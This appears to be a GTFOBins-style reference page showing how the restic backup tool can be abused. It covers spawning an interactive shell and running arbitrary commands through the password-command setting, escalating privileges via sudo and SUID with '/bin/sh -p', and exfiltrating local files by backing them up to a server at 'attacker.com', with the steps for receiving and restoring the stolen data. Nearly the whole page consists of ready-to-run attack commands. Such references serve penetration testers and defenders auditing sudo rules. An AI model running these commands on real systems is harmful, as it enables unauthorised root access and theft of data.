.. / restic

Sponsor

Fork

Star

Sponsor

Fork

Star

• Shell
• Command
• Upload

Shell

This executable can spawn an interactive system shell.

• Unprivileged

  This function can be performed by any unprivileged user.

  RESTIC_PASSWORD_COMMAND='/bin/sh -c "/bin/sh 0<&2 1<&2"' restic backup

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  RESTIC_PASSWORD_COMMAND='/bin/sh -c "/bin/sh 0<&2 1<&2"' restic backup

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  RESTIC_PASSWORD_COMMAND='/bin/sh -p -c "/bin/sh -p 0<&2 1<&2"' restic backup

• Unprivileged

  This function can be performed by any unprivileged user.

  restic --password-command='/bin/sh -c "/bin/sh 0<&2 1<&2"' backup

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  restic --password-command='/bin/sh -c "/bin/sh 0<&2 1<&2"' backup

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  restic --password-command='/bin/sh -p -c "/bin/sh -p 0<&2 1<&2"' backup

Command

This executable can run non-interactive system commands.

• Unprivileged

  This function can be performed by any unprivileged user.

  RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  RESTIC_PASSWORD_COMMAND='/path/to/command' restic backup

  Output

  The commands are executed but their output is hidden from the attacker.

• Unprivileged

  This function can be performed by any unprivileged user.

  restic --password-command='/path/to/command' backup

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  restic --password-command='/path/to/command' backup

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  restic --password-command='/path/to/command' backup

  Output

  The commands are executed but their output is hidden from the attacker.

Upload

This executable can upload local data.

• Unprivileged

  This function can be performed by any unprivileged user.

  restic backup -r rest:http://attacker.com:12345/x /path/to/input-file

  Sudo

  This function is performed by the privileged user if executed via sudo because the acquired privileges are not dropped.

  Remarks

  If there are environment variables involved, they must be passed via sudo VAR=value ... or exported then sudo -E ....

  restic backup -r rest:http://attacker.com:12345/x /path/to/input-file

  SUID

  This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.

  restic backup -r rest:http://attacker.com:12345/x /path/to/input-file

  Receiver

  The attacker must setup a server to receive the backups, in the following example rest-server is used but there are other options. To start a new instance and create a new repository use:

  rest-server --listen :12345
  restic init -r rest:http://localhost:12345/x
  

  After the command executed on the target, to extract the data from the restic repository in the current directory on the attacker side:

  restic restore -r /tmp/restic/x latest --target .
  

Source | History